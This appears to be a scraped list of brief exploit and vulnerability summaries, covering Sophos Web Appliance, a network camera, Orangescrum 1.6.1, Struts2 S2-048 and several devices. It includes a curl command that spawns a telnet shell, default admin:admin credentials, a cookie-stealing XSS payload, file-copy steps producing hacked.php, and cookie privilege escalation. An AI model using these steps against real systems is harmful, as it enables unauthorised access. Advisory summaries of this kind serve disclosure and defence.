This module exploits a remote command execution vulnerability in the Sophos Web Appliace Version <= v4.3.0.2. The vulnerability exist in a section of the machine's reporting inferaface that accepts unsanitized unser supplied information within a JSON query.
UnsetupMode == [0] Hard-coded password admin:admin - SetupMode == [1] Network Fingerprinting: 80/tcp open http HTTP/1.1 401 Unauthorized Server: Camera Web Server WWW-Authenticate: Basic realm="Camera Web Server" <title>Document Error: Unauthorized</title> <h2>Access Error: Unauthorized</h2> <p>Access to this document requires a User ID</p> Wireless Fingerprinting: ESSID:"NetCamXXXX" Encryption key:off Address: C0:56:27 Remote Command Execution: :~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh'
Orangescrum is one of task management software written in PHP. Its version 1.6.1 have multiple vulnerabilities. To exploit all of them, you have to log in first. 1. Arbitrary File Upload: Create or reply task. Then upload a file. The file will be uploaded into directory app/webroot/files/case_files, without any validation. It then can be accessed from url http://yourorangescrum/app/webroot/files/case_files/thefile. 2. SQL Injection (time based): Send a POST request to http://yourorangescrum/easycases/ajax_change_AssignTo, with POST variables caseId and assignId. 3. XSS (stored): Reply a task (choose html editor). Put your XSS code there. example <img src="nonexistimage" onerror="alert(document.cookie)">. 4. Arbitrary File Copy: Look at an image profile url, it is something like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100. To copy add variable dest, so it will be like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100&dest=hacked.php. It will copy file a6ebd6bd62ba537f37b7b8ac40aa626d.png into hacked.php that will be stored in users/image_thumb/hacked.php. Conditions: variable sizex and sizey must be the real width and height of a6ebd6bd62ba537f37b7b8ac40aa626d.png
An unauthenticated attacker can update the password via a constructed GET request, subsequently taking control of many functions of the device. Vulnerable versions include at least firmware 2.03.20, and likely many more older versions.
This exploit is a buffer overflow vulnerability in Counter Strike: Condition Zero BSP map. It corrupts the target file by creating an exploit which consists of an index buffer, vertex buffer indexes and vertex data. The exploit is written to the target file and the length of the vertex data is fuzzed to cause the crash.
This exploit is for Apache Struts2 S2-048 vulnerability. It uses a payload to exploit the vulnerability and execute a command on the server. The payload is used to clear the excluded package and class names from the OgnlUtil class and set the member access to the default. This allows the attacker to execute the command on the server.
The system backup configuration file 'running.CFG' and the wireless backup configuration file 'wifi.CFG' can be downloaded by an attacker from the root directory in certain circumstances. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access.
The application suffers from a privilege escalation vulnerability. A normal user can elevate his/her privileges by changing the Cookie 'Grant' from 1 (user) to 2 (admin) gaining administrative privileges and revealing additional functionalities or additional advanced menu settings.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain, if not all actions with administrative privileges if a logged-in user visits a malicious web site.
The vulnerable device does not properly perform authentication and authorization, allowing it to be bypassed through cookie manipulation. Setting the Cookie 'Grant' with value 1 (user) or 2 (admin) will bypass security controls in place enabling the attacker to take full control of the device management interface.
Services By CQR